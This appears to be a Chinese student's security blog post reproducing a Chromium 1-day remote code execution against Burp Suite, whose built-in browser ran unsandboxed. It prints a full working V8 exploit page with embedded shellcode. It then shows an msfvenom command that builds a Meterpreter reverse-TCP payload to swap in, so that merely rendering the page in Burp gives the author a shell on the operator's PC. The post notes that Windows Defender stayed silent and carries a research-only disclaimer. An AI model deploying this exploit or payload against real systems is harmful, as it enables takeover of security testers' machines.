<!DOCTYPE html>
<html>
	<head>
		
<title>BurpSuite简单反制-这里是一个普通学生的博客</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="/image/favicon.ico">

<link rel="stylesheet" href="/css/index.css">



<meta name="keywords" content="网络安全,">
<meta name="description" content="">


<script src="/js/jquery.min.js"></script>


<script src="/js/index.js"></script>


<script src="/js/fancybox.umd.js"></script>


<script src="/js/fancybox-images.js"></script>


<script src="/js/gitalk.min.js"></script>


<script src="/js/hljs.min.js"></script>
 
<script>hljs.highlightAll();</script>

	<meta name="generator" content="Hexo 5.4.2"></head>

	<body>
		
	<div class="header">
		<div class="header-top" id="header-top">
			<div class="h-left">
				<a href="/">
					<img src="/image/logo.png" alt="Quiet">
				</a>
			</div>
			<div class="h-right">
				<ul>
					
						
								<li>
									<a href="/">
										HOME
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/archives">
										ARCHIVE
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/categories">
										CATEGORIES
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/tags">
										TAGS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/links">
										LINKS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/about">
										ABOUT
									</a>
									<span class="dot"></span>
								</li>
								
									
				</ul>
			</div>
			<div class="h-right-close">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24">
					<path fill="none" d="M0 0h24v24H0z" />
					<path d="M3 4h18v2H3V4zm0 7h18v2H3v-2zm0 7h18v2H3v-2z" fill="rgba(68,68,68,1)" />
				</svg>
			</div>
		</div>
	</div>
	<div class="sidebar">
    <div class="topo">
        <h2>Nokali</h2>
    </div>
    <ul>
        
        <li>
            <a href="/">HOME</a>
        </li>
        
        <li>
            <a href="/archives">ARCHIVE</a>
        </li>
        
        <li>
            <a href="/categories">CATEGORIES</a>
        </li>
        
        <li>
            <a href="/tags">TAGS</a>
        </li>
        
        <li>
            <a href="/links">LINKS</a>
        </li>
        
        <li>
            <a href="/about">ABOUT</a>
        </li>
        
    </ul>
    <div class="my_foot">
        
        <a target="_blank" rel="noopener" href="https://github.com/79E/hexo-theme-quiet">
            <img src="/image/githubfavicon.ico" alt="Quiet主题">
        </a>
        
    </div>
</div>
<div class='shelter'>
</div>
<style>
    .shelter{
        background-color: #333;
        opacity:0.5;
        cursor: pointer;
        display: none; 
        position: fixed;
        left: 0;
        top: 0; 
        right: 0;
        bottom: 0;
        z-index: 1998;
    }
    .sidebar {
        width: 0;
        height: 100%;
        position: fixed;
        top: 0;
        right: 0;
        bottom: 0;
        background: #fff;
        z-index: 1999;
        text-align: center;
        box-shadow: -6px 0 20px rgba(98, 94, 94, .815)
    }

    .topo {
        width: 100%;
        height: 200px;
        background: url() no-repeat;
        background-size: 100% 100%;
        position: relative;
        display: flex;
        align-items: flex-end
    }

    .topo h2 {
        color: #fff;
        z-index: 1;
        position: relative;
        margin: 0 0 10px 10px;
        font-size: 1.2em;
        box-sizing: border-box
    }

    .topo:before {
        content: '';
        background-image: url(/image/pattern.png);
        background-repeat: repeat;
        height: 100%;
        left: 0;
        position: absolute;
        top: 0;
        width: 100%;
        z-index: 1
    }

    .sidebar ul {
        width: 100%;
        margin-top: 50px
    }

    .sidebar ul li {
        height: 50px;
        list-style: none;
        font-size: 1.2em;
        text-align: right;
        margin-right: 10px
    }

    .sidebar ul li a {
        display: grid;
        color: #5d606a;
        text-overflow: ellipsis;
        width: 100%;
        text-decoration: none
    }

    .my_foot {
        width: 100%;
        padding: 10px;
        margin-bottom: 10px;
        position: absolute;
        bottom: 0
    }

    .my_foot a {
        text-decoration: none;
        margin-right: 10px;
        display: inline-block
    }

    .my_foot a img {
        width: 30px;
        height: 30px
    }
</style>

<script>
    $( function () {
	$( '.h-right-close>svg' )
		.click( function () {
			$( '.sidebar' )
				.animate( {
					width: "66%"
				}, 500 );
			$( '.shelter' )
				.fadeIn( "slow" )
		} );
	$( '.shelter' )
		.click( function ( e ) {
			$( '.sidebar' )
				.animate( {
					width: "0"
				}, 500 );
			$( '.shelter' )
				.fadeOut( "slow" )
		} )
} )

</script>

<div class="post">
    <div class="post-header-background post-header-color"
    style="background: url('')" 
>
    <div class="post-header-background-content">
        <ul class="post-header-tag">
            
            
            <li><a href="/tags/网络安全">网络安全</a></li>
            
            
        </ul>
        
        <h1>BurpSuite简单反制</h1>
        <div class="post-header-info">
            <div class="post-header-info-author">
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20">
                        <g>
                            <path fill="#12183A"
                                d="M6.187 15.265A6.47 6.47 0 0 0 10 16.5a6.47 6.47 0 0 0 3.813-1.235A4.99 4.99 0 0 0 10 13.5a4.99 4.99 0 0 0-3.813 1.765zM5.082 14.25A6.485 6.485 0 0 1 10 12c1.965 0 3.726.872 4.918 2.25a6.5 6.5 0 1 0-9.836 0zM10 18a8 8 0 1 1 0-16 8 8 0 0 1 0 16zm0-7a3 3 0 1 1 0-6 3 3 0 0 1 0 6zm0-1.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3z">
                            </path>
                        </g>
                    </svg>
                
                <span class="post-header-info-author-text"> <a href="../../about">Nokali</a></span>
                <div class="post-header-info-author-categories">
                    
                </div>
                <p>2023-02-08 21:44:27</p>
            </div>
        </div>
    </div>
</div>
    <div class="post-content" id="content">
  
  <div id="article" class="post-content-info">
    

    <h1 id="Chromium-1day-to-Burpsuite-RCE漏洞复现"><a href="#Chromium-1day-to-Burpsuite-RCE漏洞复现" class="headerlink" title="Chromium 1day to Burpsuite RCE漏洞复现"></a>Chromium 1day to Burpsuite RCE漏洞复现</h1><p>首先贴一个链接在这里（找了一圈，觉得这个应该是原作者）</p>
<p>POC也可以在里面找到，而且作者演进出了一种0click的利用方式，但是我这里由于只是进行漏洞复现实验，能成功利用即点到为止（注：实际上非常玄学，我这里疑似自带触发0click的状况了，不知道具体原因。。）</p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/252591">https://www.anquanke.com/post/id/252591</a></p>
<p>在这方面，我只算是技术的搬运工（&#x3D; &#x3D;）</p>
<p>毕竟这个Burp反制漏洞的本质是浏览器的安全问题，具体利用细节比较复杂</p>
<p>当然，还是要强调，这里仅仅只是进行技术讨论研究，仅作攻防方面的安全研究之用，严禁任何非法行为</p>
<p>至于为什么这次是讲Burp，我只能说，除非是Yakit一类工具的用户，不然很难想象做Web安全可以完全脱离Burp。。。。几乎可以说Burp是绝大多数Web安全从业者的饭碗了</p>
<p>另外一点，也是做个简单的启示，就是为什么在各种攻防演练的时候一定要在虚拟机中操作（因为你根本想不到所谓的“防守方”会给你整什么活&#x3D; &#x3D;）</p>
<p>第二个原因，跟上次蚁剑的复现过程类似，这类安全问题不止局限于单个工具，通过对该漏洞的研究有助于提供同类安全问题的验证方案。</p>
<p>首先得到一份POC，其中的shellcode默认是弹出计算器</p>
<pre><code>&lt;html&gt;
&lt;head&gt;&lt;/head&gt;
&lt;/body&gt;
&lt;script&gt;
function pwn() &#123;
    var f64Arr = new Float64Array(1);
    var u32Arr = new Uint32Array(f64Arr.buffer);

    function f2u(f) &#123;
        f64Arr[0] = f;
        return u32Arr;
    &#125;

    function u2f(h, l)
    &#123;
        u32Arr[0] = l;
        u32Arr[1] = h;
        return f64Arr[0];
    &#125;

    function hex(i) &#123;
        return &quot;0x&quot; + i.toString(16).padStart(8, &quot;0&quot;);
    &#125;

    function log(str) &#123;
        console.log(str);
        document.body.innerText += str + &#39;\n&#39;;
    &#125;

    var big_arr = [1.1, 1.2];
    var ab = new ArrayBuffer(0x233);
    var data_view = new DataView(ab);

    function opt_me(x) &#123;
        var oob_arr = [1.1, 1.2, 1.3, 1.4, 1.5, 1.6];
        big_arr = [1.1, 1.2];
        ab = new ArrayBuffer(0x233);
        data_view = new DataView(ab);

        let obj = &#123;
            a: -0
        &#125;;
        let idx = Object.is(Math.expm1(x), obj.a) * 10;

        var tmp = f2u(oob_arr[idx])[0];
        oob_arr[idx] = u2f(0x234, tmp);
    &#125;
    for (let a = 0; a &lt; 0x1000; a++)
        opt_me(0);

    opt_me(-0);
    var optObj = &#123;
        flag: 0x266,
        funcAddr: opt_me
    &#125;;

    log(&quot;[+] big_arr.length: &quot; + big_arr.length);

    if (big_arr.length != 282) &#123;
        log(&quot;[-] Can not modify big_arr length !&quot;);
        return;
    &#125;
    var backing_store_idx = -1;
    var backing_store_in_hign_mem = false;
    var OptObj_idx = -1;
    var OptObj_idx_in_hign_mem = false;

    for (let a = 0; a &lt; 0x100; a++) &#123;
        if (backing_store_idx == -1) &#123;
            if (f2u(big_arr[a])[0] == 0x466) &#123;
                backing_store_in_hign_mem = true;
                backing_store_idx = a;
            &#125; else if (f2u(big_arr[a])[1] == 0x466) &#123;
                backing_store_in_hign_mem = false;
                backing_store_idx = a + 1;
            &#125;
        &#125;

        else if (OptObj_idx == -1) &#123;
            if (f2u(big_arr[a])[0] == 0x4cc) &#123;
                OptObj_idx_in_hign_mem = true;
                OptObj_idx = a;
            &#125; else if (f2u(big_arr[a])[1] == 0x4cc) &#123;
                OptObj_idx_in_hign_mem = false;
                OptObj_idx = a + 1;
            &#125;
        &#125;

    &#125;

    if (backing_store_idx == -1) &#123;
        log(&quot;[-] Can not find backing store !&quot;);
        return;
    &#125; else
        log(&quot;[+] backing store idx: &quot; + backing_store_idx +
            &quot;, in &quot; + (backing_store_in_hign_mem ? &quot;high&quot; : &quot;low&quot;) + &quot; place.&quot;);

    if (OptObj_idx == -1) &#123;
        log(&quot;[-] Can not find Opt Obj !&quot;);
        return;
    &#125; else
        log(&quot;[+] OptObj idx: &quot; + OptObj_idx +
            &quot;, in &quot; + (OptObj_idx_in_hign_mem ? &quot;high&quot; : &quot;low&quot;) + &quot; place.&quot;);

    var backing_store = (backing_store_in_hign_mem ?
        f2u(big_arr[backing_store_idx])[1] :
        f2u(big_arr[backing_store_idx])[0]);
    log(&quot;[+] Origin backing store: &quot; + hex(backing_store));

    var dataNearBS = (!backing_store_in_hign_mem ?
        f2u(big_arr[backing_store_idx])[1] :
        f2u(big_arr[backing_store_idx])[0]);

    function read(addr) &#123;
        if (backing_store_in_hign_mem)
            big_arr[backing_store_idx] = u2f(addr, dataNearBS);
        else
            big_arr[backing_store_idx] = u2f(dataNearBS, addr);
        return data_view.getInt32(0, true);
    &#125;

    function write(addr, msg) &#123;
        if (backing_store_in_hign_mem)
            big_arr[backing_store_idx] = u2f(addr, dataNearBS);
        else
            big_arr[backing_store_idx] = u2f(dataNearBS, addr);
        data_view.setInt32(0, msg, true);
    &#125;

    var OptJSFuncAddr = (OptObj_idx_in_hign_mem ?
        f2u(big_arr[OptObj_idx])[1] :
        f2u(big_arr[OptObj_idx])[0]) - 1;
    log(&quot;[+] OptJSFuncAddr: &quot; + hex(OptJSFuncAddr));

    var OptJSFuncCodeAddr = read(OptJSFuncAddr + 0x18) - 1;
    log(&quot;[+] OptJSFuncCodeAddr: &quot; + hex(OptJSFuncCodeAddr));

    var RWX_Mem_Addr = OptJSFuncCodeAddr + 0x40;
    log(&quot;[+] RWX Mem Addr: &quot; + hex(RWX_Mem_Addr));

    var shellcode = new Uint8Array(
           [0x89, 0xe5, 0x83, 0xec, 0x20, 0x31, 0xdb, 0x64, 0x8b, 0x5b, 0x30, 0x8b, 0x5b, 0x0c, 0x8b, 0x5b,
            0x1c, 0x8b, 0x1b, 0x8b, 0x1b, 0x8b, 0x43, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x58, 0x3c, 0x01, 0xc3,
            0x8b, 0x5b, 0x78, 0x01, 0xc3, 0x8b, 0x7b, 0x20, 0x01, 0xc7, 0x89, 0x7d, 0xf8, 0x8b, 0x4b, 0x24,
            0x01, 0xc1, 0x89, 0x4d, 0xf4, 0x8b, 0x53, 0x1c, 0x01, 0xc2, 0x89, 0x55, 0xf0, 0x8b, 0x53, 0x14,
            0x89, 0x55, 0xec, 0xeb, 0x32, 0x31, 0xc0, 0x8b, 0x55, 0xec, 0x8b, 0x7d, 0xf8, 0x8b, 0x75, 0x18,
            0x31, 0xc9, 0xfc, 0x8b, 0x3c, 0x87, 0x03, 0x7d, 0xfc, 0x66, 0x83, 0xc1, 0x08, 0xf3, 0xa6, 0x74,
            0x05, 0x40, 0x39, 0xd0, 0x72, 0xe4, 0x8b, 0x4d, 0xf4, 0x8b, 0x55, 0xf0, 0x66, 0x8b, 0x04, 0x41,
            0x8b, 0x04, 0x82, 0x03, 0x45, 0xfc, 0xc3, 0xba, 0x78, 0x78, 0x65, 0x63, 0xc1, 0xea, 0x08, 0x52,
            0x68, 0x57, 0x69, 0x6e, 0x45, 0x89, 0x65, 0x18, 0xe8, 0xb8, 0xff, 0xff, 0xff, 0x31, 0xc9, 0x51,
            0x68, 0x2e, 0x65, 0x78, 0x65, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x89, 0xe3, 0x41, 0x51, 0x53, 0xff,
            0xd0, 0x31, 0xc9, 0xb9, 0x01, 0x65, 0x73, 0x73, 0xc1, 0xe9, 0x08, 0x51, 0x68, 0x50, 0x72, 0x6f,
            0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x89, 0x65, 0x18, 0xe8, 0x87, 0xff, 0xff, 0xff, 0x31, 0xd2,
            0x52, 0xff, 0xd0, 0x90, 0x90, 0xfd, 0xff]
    );

    log(&quot;[+] writing shellcode ... &quot;);
    for (let i = 0; i &lt; shellcode.length; i++)
        write(RWX_Mem_Addr + i, shellcode[i]);

    log(&quot;[+] execute shellcode !&quot;);
    opt_me();
&#125;
pwn();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>先简单讲一讲大概的原理</p>
<p>Burp内置了对页面的渲染功能，这样就可以在工具内部显示网页，基本上这个是必需的基础功能，而Burp内部使用的是Chromium来实现这一功能，Chromium曾经爆出过多个1day漏洞，因此Burp的这个反制漏洞本质是之前Chromium的1day漏洞</p>
<p>而最致命的一点其实不只是Chromium存在RCE漏洞，而是Burp在启动的时候内部加载Chromium的命令附带了关闭浏览器沙箱的参数（–no-sandbox），这就导致内置浏览器的RCE能直接拿下操作者PC的权限</p>
<p>新版Burp修复了漏洞，更新了内置浏览器而且貌似启用了沙箱，然而众所周知Burp是个商业软件，很多师傅用的是破解版，所以。。。。只能说，记得及时更新，以及，善用虚拟机。</p>
<p>初始的利用方式是HTTP history和Repeater中HTTP Response的Render，通过浏览器渲染POC页面从而触发漏洞，弹出计算器（原作者提供了一种利用js动态分析功能来稳定实现0click RCE的方法），这里借助python自带的功能来开启一个简单的HTTP服务器，用于放置POC<br>（如果刷新显示304的话Ctrl+F5可以强制刷新）<br><img src="/2023/02/08/BurpSuite%E7%AE%80%E5%8D%95%E5%8F%8D%E5%88%B6/1.png" alt="图片"><br><img src="/2023/02/08/BurpSuite%E7%AE%80%E5%8D%95%E5%8F%8D%E5%88%B6/2.png" alt="图片"></p>
<p>那么接下来这里贴近一下实战，试着把计算器修改成反弹shell</p>
<p>由于最初代码中使用的shellcode格式为Uint8Array，这里生成csharp的shellcode，即可免去转换shellcode的过程，由此，举一反三，可以使用任意shellcode来实现自定义的功能</p>
<pre><code>msfvenom -p windows/meterpreter/reverse_tcp -b &#39;\x00&#39; LHOST=192.168.159.128 LPORT=55555 -f csharp
</code></pre>
<p><img src="/2023/02/08/BurpSuite%E7%AE%80%E5%8D%95%E5%8F%8D%E5%88%B6/3.png" alt="图片"></p>
<p>将其填充替换原本的shellcode，访问并渲染页面即可成功复现漏洞，且Windows Defender全程沉默，成功实现防守方反制攻击者的效果——拿下PC权限。</p>
<p><img src="/2023/02/08/BurpSuite%E7%AE%80%E5%8D%95%E5%8F%8D%E5%88%B6/4.png" alt="图片"></p>
<p>结束。</p>

  </div>
  <div id=""></div>
</div>

<script>
  
Fancybox.bind('[data-fancybox="fancybox-gallery-img"]', {
  dragToClose: true,
  Toolbar: true,
  closeButton: "top",
  Image: {
    zoom: true,
  },
  on: {
    initCarousel: (fancybox) => {
      const slide = fancybox.Carousel.slides[fancybox.Carousel.page];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
    "Carousel.change": (fancybox, carousel, to, from) => {
      const slide = carousel.slides[to];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
  },
});
</script>

<style>
    #noneimg img {
        display: none;
        z-index: 9999;
        /* width: 600px !important; */
        min-width: 0%;
        max-width: 90%;
        max-height: 80%;
        border-radius: 0px;
        position: fixed;
        box-shadow: 0 0 0px #c3c3c300 !important;
        left: 0;
        top: 0;
        right: 0;
        bottom: 0;
        margin: auto !important;
    }

    @media screen and (max-width:600px) {
        #noneimg img {
            max-width: 88%
        }
    }
</style>

    <div class="post-paging">
    

    
    <a href="/2023/02/08/2023-2-8/">
        <div class="post-paging-next">
            <span>下一篇</span>
            <p>一篇没什么意义的文章</p>
        </div>
    </a>
    
</div>
</div>
		
<div class="footer">
	<div class="Copyright">
		©2023 By Nokali. 主题：<a
			style="text-decoration: none;display: contents; color: #898F9F;"
			target="_blank" rel="noopener" href="https://github.com/79e/hexo-theme-quiet">Quiet</a>
	</div>
	<div class="contact">
		
		<a target="_blank" rel="noopener" href="https://github.com/79E/hexo-theme-quiet">
			<img src="/image/githubfavicon.ico" alt="Quiet主题">
		</a>
		
	</div>
</div>

<script src="/js/gotop.js"></script>


<style type="text/css">
    @media screen and (min-width: 600px) {
        .goTop>span {
            display: flex;
            align-items: center;
            justify-content: center;
            border-radius: 10px;
            width: 40px;
            height: 40px;
            cursor: pointer;
            opacity: 0.8;
            background: rgba(18, 24, 58, 0.06);
            text-align: center;
            transition: border .5s;
            border: 1px solid rgba(18, 24, 58, 0.06);

            -moz-transition: border .5s;
            /* Firefox 4 */
            -webkit-transition: border .5s;
            /* Safari 和 Chrome */
            -o-transition: border .5s;
            /* Opera */
        }

        .goTop>span:hover {
            border: 1px solid #6680B3;
        }


        .goTop {
            position: fixed;
            right: 30px;
            bottom: 80px;
        }

        .goTop>span>svg {
            width: 20px;
            height: 20px;
            opacity: 0.7;
        }

    }

    @media screen and (max-width: 600px) {
        .goTop {
            display: none;
        }
    }
</style>
<div class="goTop" id="js-go_top">
    <span>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
            <g>
                <path d="M13 12v8h-2v-8H4l8-8 8 8z"></path>
            </g>
        </svg>
    </span>
</div>
<script>
    $( '#js-go_top' )
	.gotoTop( {
		offset: 500,
		speed: 300,
		animationShow: {
			'transform': 'translate(0,0)',
			'transition': 'transform .5s ease-in-out'
		},
		animationHide: {
			'transform': 'translate(100px,0)',
			'transition': 'transform .5s ease-in-out'
		}
	} );
</script>


<script>
	console.log('\n %c Hexo-Quiet 主题 %c https://github.com/79e/hexo-theme-quiet \n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;')
</script>
	</body>
</html>

